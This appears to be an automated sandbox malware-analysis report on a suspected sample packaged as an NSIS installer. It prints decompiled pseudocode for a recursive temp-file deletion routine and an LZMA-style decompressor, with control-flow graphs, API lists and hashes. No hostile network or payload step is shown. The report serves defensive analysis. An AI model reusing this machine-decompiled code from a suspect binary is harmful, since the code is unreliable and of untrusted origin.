                                              Similarity
                                              • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                              • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\qHpeBvr9cR.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\qHpeBvr9cR.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                              • API String ID: 2193684524-1196155684
                                              • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                              • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                                              • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                              • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                                              C-Code - Quality: 94%
                                              			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004058CF(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x424008 =  *0x424008 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405CFB(0x421588, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405835(_t72);
					} else {
						lstrcatA(0x421588, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405819( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CFB(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004059B3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404FE7(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x424008 =  *0x424008 + 1;
										} else {
											E00404FE7(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405A49(__eflags);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405620(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4); // executed
						goto L29;
					}
					__eflags =  *0x421588 - 0x5c;
					if( *0x421588 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405FF6(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004057EE(_t72);
							E004059B3(_t72);
							_t37 = RemoveDirectoryA(_t72); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404FE7(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404FE7(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405A49(__eflags);
						}
						L33:
						 *0x424008 =  *0x424008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                              0x0040562b
                                              0x0040562f
                                              0x00405638
                                              0x0040563b
                                              0x0040563e
                                              0x00405646
                                              0x00405648
                                              0x00405649
                                              0x00000000
                                              0x00405649
                                              0x00405658
                                              0x00405658
                                              0x0040565b
                                              0x0040565e
                                              0x00405672
                                              0x00405679
                                              0x0040567e
                                              0x00405680
                                              0x00405690
                                              0x00405682
                                              0x00405688
                                              0x00405688
                                              0x00405695
                                              0x00405698
                                              0x004056a3
                                              0x004056a9
                                              0x004056ae
                                              0x004056be
                                              0x004056c0
                                              0x004056c6
                                              0x004056c9
                                              0x004056cc
                                              0x00405789
                                              0x00405789
                                              0x0040578d
                                              0x0040578f
                                              0x0040578f
                                              0x0040578f
                                              0x0040578f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004056d2
                                              0x004056d2
                                              0x004056db
                                              0x004056e1
                                              0x004056e6
                                              0x004056e9
                                              0x004056eb
                                              0x004056ef
                                              0x004056f1
                                              0x004056f1
                                              0x004056ef
                                              0x004056f4
                                              0x004056f7
                                              0x0040570a
                                              0x0040570c
                                              0x00405711
                                              0x00405718
                                              0x00405730
                                              0x00405736
                                              0x0040573c
                                              0x0040573e
                                              0x00405763
                                              0x00405740
                                              0x00405740
                                              0x00405744
                                              0x00405758
                                              0x00405746
                                              0x00405749
                                              0x0040574e
                                              0x00405750
                                              0x00405751
                                              0x00405751
                                              0x00405744
                                              0x0040571a
                                              0x00405720
                                              0x00405722
                                              0x00405728
                                              0x00405728
                                              0x00405722
                                              0x00000000
                                              0x00405718
                                              0x004056f9
                                              0x004056fc
                                              0x004056fe
                                              0x00000000
                                              0x00000000
                                              0x00405700
                                              0x00405702
                                              0x00000000
                                              0x00000000
                                              0x00405704
                                              0x00405708
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405768
                                              0x00405772
                                              0x00405778
                                              0x00405778
                                              0x00405783
                                              0x00000000
                                              0x00405783
                                              0x0040569a
                                              0x004056a1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00405660
                                              0x00405660
                                              0x00405662
                                              0x00405793
                                              0x00405796
                                              0x00405799
                                              0x004057eb
                                              0x004057eb
                                              0x004057eb
                                              0x0040579b
                                              0x0040579e
                                              0x004057a9
                                              0x004057ae
                                              0x004057b0
                                              0x00000000
                                              0x00000000
                                              0x004057b3
                                              0x004057b9
                                              0x004057bf
                                              0x004057c5
                                              0x004057c7
                                              0x00000000
                                              0x004057e3
                                              0x004057c9
                                              0x004057cd
                                              0x00000000
                                              0x00000000
                                              0x004057d2
                                              0x004057d7
                                              0x004057d8
                                              0x00000000
                                              0x004057d9
                                              0x004057a0
                                              0x004057a0
                                              0x00000000
                                              0x004057a0
                                              0x00405668
                                              0x0040566c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040566c

                                              APIs
                                              • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 0040563E
                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 00405688
                                              • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056A9
                                              • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056AF
                                              • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,766DF560), ref: 004056C0
                                              • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                                              • FindClose.KERNELBASE(?), ref: 00405783
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.302029421.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.302004824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302049001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302057343.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302063724.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302177827.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302199848.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.302210667.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_qHpeBvr9cR.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\qHpeBvr9cR.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsx95CD.tmp\*.*$\*.*
                                              • API String ID: 2035342205-841501831
                                              • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                              • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                                              • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                              • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00406333 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 518 406333-406338 519 4063a9-4063c7 518->519 520 40633a-406369 518->520 523 40699f-4069b4 519->523 521 406370-406374 520->521 522 40636b-40636e 520->522 525 406376-40637a 521->525 526 40637c 521->526 524 406380-406383 522->524 527 4069b6-4069cc 523->527 528 4069ce-4069e4 523->528 529 4063a1-4063a4 524->529 530 406385-40638e 524->530 525->524 526->524 531 4069e7-4069ee 527->531 528->531 534 406576-406594 529->534 532 406390 530->532 533 406393-40639f 530->533 535 4069f0-4069f4 531->535 536 406a15-406a21 531->536 532->533 539 406409-406437 533->539 537 406596-4065aa 534->537 538 4065ac-4065be 534->538 540 406ba3-406bad 535->540 541 4069fa-406a12 535->541 543 4061b7-4061c0 536->543 546 4065c1-4065cb 537->546 538->546 544 406453-40646d 539->544 545 406439-406451 539->545 547 406bb9-406bcc 540->547 541->536 552 4061c6 543->552 553 406bce 543->553 548 406470-40647a 544->548 545->548 549 4065cd 546->549 550 40656e-406574 546->550 551 406bd1-406bd5 547->551 559 406480 548->559 560 4063f1-4063f7 548->560 561 406549-40654d 549->561 562 4066de-4066eb 549->562 550->534 558 406512-40651c 550->558 554 406272-406276 552->554 555 4062e2-4062e6 552->555 556 4061cd-4061d1 552->556 557 40630d-40632e 552->557 553->551 569 406b22-406b2c 554->569 570 40627c-406295 554->570 566 406b31-406b3b 555->566 567 4062ec-406300 555->567 556->547 563 4061d7-4061e4 556->563 557->523 571 406b61-406b6b 558->571 572 406522-406544 558->572 580 4063d6-4063ee 559->580 581 406b3d-406b47 559->581 573 4064aa-4064b0 560->573 574 4063fd-406403 560->574 564 406553-40656b 561->564 565 406b55-406b5f 561->565 562->543 563->553 576 4061ea-406230 563->576 564->550 565->547 566->547 577 406303-40630b 567->577 569->547 579 406298-40629c 570->579 571->547 572->562 575 40650e 573->575 578 4064b2-4064d0 573->578 574->539 574->575 575->558 582 406232-406236 576->582 583 406258-40625a 576->583 577->555 577->557 584 4064d2-4064e6 578->584 585 4064e8-4064fa 578->585 579->554 586 40629e-4062a4 579->586 580->560 581->547 587 406241-40624f GlobalAlloc 582->587 588 406238-40623b GlobalFree 582->588 589 406268-406270 583->589 590 40625c-406266 583->590 591 4064fd-406507 584->591 585->591 592 4062a6-4062ad 586->592 593 4062ce-4062e0 586->593 587->553 594 406255 587->594 588->587 589->579 590->589 590->590 591->573 595 406509 591->595 596 4062b8-4062c8 GlobalAlloc 592->596 597 4062af-4062b2 GlobalFree 592->597 593->577 594->583 599 406b49-406b53 595->599 600 40648f-4064a7 595->600 596->553 596->593 597->596 599->547 600->573
                                              C-Code - Quality: 98%
                                              			E00406333() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
